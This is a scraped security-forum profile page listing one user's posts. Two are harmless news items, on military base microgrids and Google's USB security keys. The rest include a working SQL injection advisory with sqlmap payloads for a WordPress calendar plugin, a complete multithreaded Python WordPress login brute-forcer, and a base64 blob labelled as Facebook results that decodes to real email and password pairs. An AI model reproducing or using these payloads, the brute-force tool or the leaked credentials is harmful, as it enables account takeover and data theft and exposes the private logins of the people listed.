-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
https://code.google.com/p/pentest-bookmarks/downloads/list
-
ONE click will automatically check for SQL Injection, XSS,etc/passwd Description Made for Admins, to Scan the OWN Website for Vulnerabilities! This Software can not Hack Websites, it will just scan for Vulnerabilities.. Lean back, ONE click will automatically check for SQL Injection, XSS, etc/passwd Vulnerabilities! (Mostly used Vulnerabilities by Hackers) Why waiting up to 30 minutes scans? Multi Vuln Checker 2014 ist faster as you can see. It shows all activities with Injection methods live, so you can follow all steps. How to use: 1. Put your Website URL in, click Fast URL Scan (or Deep..) 2. Click "Send to Multi Vuln Checker" to send the URL there. 3. Click "Check ALL SQLI, XSS, etc/passwd" (wait 1-5 minutes~) That's it! - Very Fast and VERY Effective. Our RegEx Function will Snipe the URLs out, so we will not waste our time with searching in wrong area and URLs. Features - One Click Aio Automatically Checks for SQLi, XSS, etc/passwd File Vulnerability - Single Check Function for SQL Injection Vulnerability - Single Check Function for XSS Vulnerability - Single Check Function for etc/passwd File Vulnerability - 1. Fast URL Scan = Find all URLs - 2. Send to Multi Vuln checker - 3. Check ALL URL for SQLi, XSS, etc/passwd - Press "DEL" or "Back" Button to Delete URL or use Remove Button - Find URLs - Different Methods - Find IDs - Find IPs - Red ProgressBar (If Loading/Scanning Content) - Green ProgressBar (If Finished Loading/Scanning Content) - Find Images - Find FTP - Find Java Scripts - Base64 Decode and Encode Function - Text to Binary / Binary to Text Function - Text to Hex / Hex to Text Function - Octal to Decimal / Decimal to Octal Function - URL Decode / URL Encode Function - Vuln Cheats *RegEx Cheats - CMDs Added* - Custom URL RegEx Scanner - Fast Scan (Very Fast Scan.) - Deep Scan (Deep, but Fast Scan.) - Ultra Deep Scan (if it is a big website, then it can take 5-10 minutes..) - more Features in update. Make sure to visit our Site, Blog and FB - Good Luck and Have Fun Sharaffodin Blog: Tutorials, Downloads, Computer-Internet Security - PS85 (Project 3132333) https://www.facebook.com/Sharaffodin https://www.virustotal.com/ro/file/312ce42ff38b70a4ad203b6350a2b1103d748f54673503b5d092446cd7dc3d1f/analysis/1414058991/ Download Multi Vuln Checker 2014 | SourceForge.net
-
###################### # Exploit Title : WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip # Date : 2014-10-23 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability calid variable is not sanitized. ###################### # PoC http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli] # Sqlmap --- Place: GET Parameter: calid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41)) --- ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Wordpress CP Multi View Event Calendar 1.01 SQL Injection
-
This is a python script that performs brute forcing against WordPress installs using a wordlist. # WordPress Brute Force by Claudio Viviani # # Inspired by xSecurity's WordPress Brute Muliththreading # # Tested on Wordpress 3.x and 4.x # # Disclaimer: # # This exploit is intended for educational purposes only and the author # can not be held liable for any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this exploit. # In any case you disagree with the above statement,stop here. # # Requirements: # # 1) python's httplib2 lib # Installation: pip install httplib2 # # Features: # # 1) Multithreading # 2) http and https protocols # 3) Random User Agent #!/usr/bin/env python# # WordPress Brute Force by Claudio Viviani # # Inspired by xSecurity's WordPress Brute Muliththreading # # Tested on Wordpress 3.x and 4.x # # Disclaimer: # # This exploit is intended for educational purposes only and the author # can not be held liable for any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this exploit. # In any case you disagree with the above statement,stop here. # # Requirements: # # 1) python's httplib2 lib # Installation: pip install httplib2 # # Features: # # 1) Multithreading # 2) http and https protocols # 3) Random User Agent import urllib, httplib, httplib2 import socket, sys, os, os.path, optparse, random from threading import Thread from time import sleep banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' _______ __ _______ | _ .----.--.--| |_.-----| _ .-----.----.----.-----. |. 1 | _| | | _| -__|. 1___| _ | _| __| -__| |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____| |: 1 \ |: | |::.. . / |::.| `-------' `---' W0rdBRUTEpr3ss v1.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] UA = random.choice(userAgent) return UA def urlCMS(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') os._exit(1) # Page login url = url+'/wp-login.php' return url def bodyCMS(username,pwd): body = { 'log':username, 'pwd':pwd, 'wp-submit':'Login', 'testcookie':'1' } return body def headersCMS(UA): headers = { 'User-Agent': UA, 'Content-type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' } return headers def responseCMS(response): if response['set-cookie'].split(" ")[-1] == "httponly": return "1" def connection(url,user,password,UA,timeout): username = user pwd = password http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True) # HTTP POST Data body = bodyCMS(username,pwd) # Headers headers = headersCMS(UA) try: response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body)) if str(response.status)[0] == "4" or str(response.status)[0] == "5": print('\n[X] HTTP error, code: '+str(response.status)) os._exit(1) if responseCMS(response) == "1": print('\n') print('[!] Password FOUND!!!') print('') print('[!] Username: '+user+' Password: '+password) os._exit(0) except socket.timeout: print('\n[X] Connection Timeout') os._exit(1) except socket.error: print('\n[X] Connection Refused') os._exit(1) except httplib.ResponseNotReady: print('\n[X] Server Not Responding') os._exit(1) except httplib2.ServerNotFoundError: print('\n[X] Server Not Found') os._exit(1) except httplib2.HttpLib2Error: print('\n[X] Connection Error!!') os._exit(1) commandList = optparse.OptionParser('usage: %prog -t TARGET_URL -u USER -w WORDLIST_FILE [-p PORT] [--timeout sec]\n') commandList.add_option('-t', '--target', action="store", help="Insert URL: http://www.victim.com", ) commandList.add_option('-u', '--username', action="store", help="Insert username", ) commandList.add_option('-w', '--wordfilelist', action="store", help="Insert wordlist files", ) commandList.add_option('-p', '--port', action="store", default=0, type="int", help="[insert Port Number] - Default 80 or 443", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.username or not options.wordfilelist: print(banner) print commandList.print_help() sys.exit(1) # args to vars url = options.target user = options.username password = options.wordfilelist timeout = options.timeout # Check if Wordlist file exists and has readable if not os.path.isfile(password) and not os.access(password, os.R_OK): print "[X] Wordlist file is missing or is not readable" sys.exit(1) # Open and read Wordlist file wordlist = open(password).read().split("\n") # Total lines (password) in Wordlist file totalwordlist = len(wordlist) # Gen Random UserAgent UA = randomAgentGen() # Url to url+login_cms_page url = urlCMS(url) print(banner) print print('[+] Target.....: '+options.target) print('[+] Wordlist...: '+str(totalwordlist)) print('[+] Username...: '+user) print('[+]') print('[+] Connecting.......') print('[+]') # Reset var for "progress bar" count = 0 threads = [] for pwd in wordlist: count += 1 t = Thread(target=connection, args=(url,user,pwd,UA,timeout)) t.start() threads.append(t) sys.stdout.write('\r') sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist)) sys.stdout.flush() sleep(0.210) for a in threads: a.join() # no passwords found print('\n[X] Password NOT found ') http://packetstorm.sigterm.no/Crackers/W0rdBRUTEpr3ss_v1_0.py.txt
-
Hacker, Terrorist Threats Spur Bases to Build Power Grids
Fi8sVrs posted a topic in Stiri securitate
Military Worries About Facilities Being Linked to Vulnerable Utility Companies Roof panels are outfitted with solar panels that help to power the sprawling Marine Corps combat center in Twentynine Palms, Calif. Stuart Palley for The Wall Street Journal TWENTYNINE PALMS, Calif.—Fear that utility companies remain vulnerable to hackers, terrorists and natural disasters has the Pentagon pushing construction of independent power grids at military bases across the U.S., including one nearing completion here at the Marine Corps combat center. The base at Twentynine Palms, home to about 22,000 people and spread across 1,100 square miles of the Mojave Desert, still buys power from Southern California Edison. But soon it will be able to operate even if there is a blackout, using a system of small power plants, solar panels, batteries and diesel generators. It already is saving $10 million a year in energy costs. Dozens of U.S. bases are marching in the same direction as they try to keep up with the growing power demands of a modern military. “A lot of bases want what we’ve got,” said Gary Morrissett, the energy manager at Twentynine Palms. The U.S. military needs an uninterrupted flow of electricity to support operations at home and around the globe, officials said. Drones in Afghanistan, for example, have been piloted from Creech Air Force Base in Nevada. Diesel-run generators that provide backup power can’t do the job alone, given the electricity demands of the high-tech era. “When I was a major in the first Gulf War, we went over there without computers or email,” said Greg Bean, a retired Army colonel who works as director of public works at Fort Bragg in North Carolina, one of the Army’s biggest bases. “Now, if you lose a server, your operations almost cease.” Worries about electricity went up a notch last year when assailants disabled an electrical substation in California by shooting at 17 transformers that help power Silicon Valley. The unsolved attack “made us think about our dependence, and how we position ourselves to reduce that risk,” said Capt. Alex Stites of the Office of the Deputy Assistant Secretary of the Navy for Energy. Increasingly, the Pentagon wants power from its own sources. Solar panels, for example, have become almost as common on bases as flagpoles. Photovoltaic panels provide nearly a quarter of the electricity at Nellis Air Force Base near Las Vegas. The panels already save the base about $1 million a year, said Jeffrey Blazi, base energy manager, and a proposed expansion would double the output. Fort Bragg is building a microgrid similar to the one at Twentynine Palms. On a typical day, Fort Bragg makes about half the power it needs. It is narrowing the gap by trimming consumption. For example, the base replaced electric dryers for parachutes with a “solar wall” that absorbs the sun’s heat and funnels hot air up a tall silo to dry hanging parachutes. “The endgame is to be able to survive if the grid goes down,” said Paul Orzeske, who recently retired as president of Honeywell Building Solutions, the company helping build Fort Bragg’s microgrid. For years, experts have recommended the U.S. military seek independence from commercial utilities. “Our grid is old and it’s reliant on technology that’s outdated,” said Michael Wu, energy program director for the Truman National Security Project & Center for National Policy, a Washington think tank. A 2008 report from the Defense Science Board, a panel that advises the Pentagon, said faith in the electric grid was misplaced. The report, titled “More Fight — Less Fuel,” said it was unwise to assume that commercial power was reliable and that the backup systems on U.S. bases were adequate. Of particular concern, the report said, was the U.S. electrical system’s reliance on large transformers—usually housed at remote electrical substations—which send electricity across long distances. “Largely unprotected,” the report said, “they can be easily targeted and destroyed,” leading to blackouts that could last months or years. Widely read, the report pushed the discussion of electricity into a matter of national security. Base Energy Manager Gary Morrissett inside the control room of a cogeneration station at the Marine Corps Air Ground Combat Center in Twentynine Palms. STUART PALLEY More recently, the Navy warned it is worried about the grid’s vulnerabilities and said “we cannot rely primarily on an aging and increasingly stressed transmission grid to deliver mission-critical power.” At Twentynine Palms, base officials started worrying about power supplies during the California energy crisis that triggered rolling blackouts 14 years ago. Diesel generators provided the only emergency power at the time. At first, the base added a small generating plant, followed by solar panels and batteries. This summer, it finished construction of a second generating plant that makes electricity and chills water, which cools buildings in a desert climate that often tops 90 degrees. Technicians monitor equipment settings and temperatures in buildings with gear from Johnson Controls Inc., reducing complaints about hot rooms. Motion sensors and high-efficiency lighting cut electricity consumption. Engineers estimate they will soon be able to generate about 80% of the electricity the base needs. As the military gains more experience, and as retrofitting costs drop, the pace of development will pick up, said Dennis McGinn, assistant secretary of the Navy and a retired vice admiral. More than money is at stake, he said: “Mission readiness is tied to energy security.” Via Hacker, Terrorist Threats Spur Bases to Build Power Grids - WSJ - WSJ -
It shouldn't surprise you that Google's a big proponent of online security, and that's why it's rolling out support for a new way to prove you are you who are: a USB Security Key. Google's normal approach to two-step authorization involves getting a text on your phone to verify your identity, but that isn't always ideal. Maybe you suck at keeping your phone charged. Or maybe you're abroad (your author's had to deal with that particular headache a few times) and don't want to get slammed with roaming charges. Having a dedicated secure USB key around means you'll be able to log into Google's ecosystem without having to worry about phishing or having your phone handy. Alas, there are a few caveats: you have to be a Chrome user, for one. You can't turn any ol' thumb drive laying around into a security key, either - it's got to be one that supports the FIDO authentication standard. Still, there's some more icing on this cake: other sites and services can choose to use FIDO authentication too, and plenty of big name players like Microsoft, Alibaba and PayPal have already pledged their support. Thinking of taking the plunge? You can claim some compatible hardware for just under $20, so there's no excuse for not locking your digital world down. Via Google now lets you prove your identity with a USB security key
-
878 results for 'facebook' b64 c3VwZXJfYW5uYV85QGxpdmUuZGU6cXdlcnR6dWlvcMO8DQpzdXBlcl9naXJsX2FubmFAbGl2ZS5h dDpyb2JlcnQNCmRpX3NhOTlAaG90bWFpbC5jb206MTExMTExDQpkaV9zYTk5QGhvdG1haWwuY29t OjExMTExMQ0KOmFzZGZnaGprbMO2w6QgDQo6cXdlcnR6dWlvcMO8IA0Kc3VwZXJfZ2lybF9hbm5h QGxpdmUuYXQ6cm9iZXJ0DQpzdXBlcl9hbm5hXzlAbGl2ZS5kZTpxd2VydHp1aW9ww7wNCnN1cGVy X2FubmFfOUBsaXZlLmRlOnF3ZXJ0enVpb3DDvA0Ka2xhdXNfZmFic2l0c180OEBsaXZlLmF0OjEz MDM2Mg0Ka2xhdXNfZmFic2l0c180OEBsaXZlLmF0OjEzMDM2Mg0Kc3VwZXJfYW5uYV85QGxpdmUu ZGU6YW5uYWlzdGNvb2wNCjphbm5haXN0Y29vbA0Kc3VwZXJfZ2lybF9hbm5hQGxpdmUuZGU6cm9i ZXJ0DQpNaWNoZWxsZV9oZGxAbGl2ZS5hdDpyb2JlcnQNCm1heF9zY2huaXR6ZWxtYW5uQGxpdmUu ZGU6cm9iZXJ0DQpuYWRpbmVfcmFkdWNvdmlAaG90bWFpbC5jb206cm9iZXJ0DQpsdWNreS1jaHJp c0BnbXgubmV0OjI2MDUyMDAwDQphbGV4X3NhbmRyYTI3MDZAaG90bWFpbC5jb206MjcwNjE5OTkN CmxvdmVzX2hlX0Bob3RtYWlsLmNvbTpyb2JlcnQNCkxpbGx5X2xvdmVfQGxpdmUuYXQ6cm9iZXJ0 DQpNYXhfbGlrZV95b3VAbGl2ZS5hdDpyb2JlcnQNCk5hTmFfQ29tZU9uQGxpdmUuYXQ6cm9iZXJ0 DQptaWtpX21hdXN4REBsaXZlLmF0OnJvYmVydA0KTWljaGVsbGVfaGRsQGxpdmUuYXQ6cm9iZXJ0 DQpzdXBlcl9hbm5hXzlAbGl2ZS5hdDoxNDA3MjAwMA0Kc3VwZXJfYW5uYV85QGxpdmUuZGU6YW5u YWlzdGNvb2wNCnN1cGVyX2FubmFfOUBsaXZlLmRlOmFubmFpc3Rjb29sDQptaWNoZWxsZV9oZGxA bGl2ZS5hdDptaWNoZWxsZTE0DQptYXhpLmhlbmdsQGdteC5kZTpmcmVpd2lsZA0KbWF4aS5oZW5n bEBnbXguZGU6ZnJlaXdpbGQNCm1heGkuaGVuZ2xAZ214LmRlOmZyZWl3aWxkDQpmb3JkZnJlYWsx NUBmcmVlbmV0LmRlOmZvcmRmcmVhazE1QGZyZWVuZXQuZGUNCnBlcmljLWRyYWdhbkBob3RtYWls LmRlOnBlcmljLWRyYWdhbkBob3RtYWlsLmRlDQpjcmF6eWNhZ2xhQGhvdG1haWwuZGU6Y3Jhenlj YWdsYUBob3RtYWlsLmRlDQphbGlheWRvZ2R1QGhvdG1haWwuZGU6YWxpYXlkb2dkdUBob3RtYWls LmRlDQpwYWxtaXJhLWNvc3RhQGhvdG1haWwuZGU6cHJpbWExMjM0NTY3ODkwc29maWENCnBhbG1p cmEtY29zdGFAaG90bWFpbC5kZToxMjM0NTYNCmFuYS1zb2ZpYUBob3RtYWlsLmRlOnNvZmlhMQ0K cHJpbWExMjM0NTY3ODkwc29maWE6MjAxMS0xMi0xMlQxNzoyMDo1MFoNCmFuYS1zb2ZpYUBob3Rt YWlsLmRlOnNvZmlhMQ0KcGFsbWlyYS1jb3N0YUBob3RtYWlsLmRlOnByaW1hMTIzDQpwYWxtaXJh LWNvc3RhQGhvdG1haWwuZGU6cHJpbWExMjM0NTY3ODkwc29mYQ0KbmluYS12aWVpcmFAbGl2ZS5k ZTpuaW5hMTINCmQuaGVyYjk5QHdlYi5kZTpkLmhlcmI5OUB3ZWIuZGUNCm1hbm5pLmxpbGx5QHdl Yi5kZTptYW5uaS5saWxseUB3ZWIuZGUNCmlzYWJlbGxhLmxpbGx5QHdlYi5kZTppc2FiZWxsYS5s aWxseUB3ZWIuZGUNCmlzYWJlbGwubGlsbHlAd2ViLmRlOmlzYWJlbGwubGlsbHlAd2ViLmRlDQpp c2FiZWxsYS5saWxseUB3ZWIuZGU6aXNhYmVsbGEubGlsbHlAd2ViLmRlDQphbGJpbmEuc2Nob2xs QHdlYi5kZTphbGJpbmEuc2Nob2xsQHdlYi5kZQ0Kb2xva28uMTJvbG9rb0B3ZWIuZGU6b2xva28u MTJvbG9rb0B3ZWIuZGUNCm1lbGJvcm4yNEBsaXZlLmRlOmphY2sxMjMNCm1lbGJvcm4yNEBsaXZl LmRlOmphY2sxMjMNCnRlZGR5YmFyMTlAbGl2ZS5kZTp0ZWRkeWJhcjE5QGxpdmUuZGUNCm1lbGJv cm4yNEBsaXZlLmRlOm1lbGJvcm4yNEBsaXZlLmRlDQp0ZWRkeWJhcjE5QGxpdmUuZGU6dGVkZHli 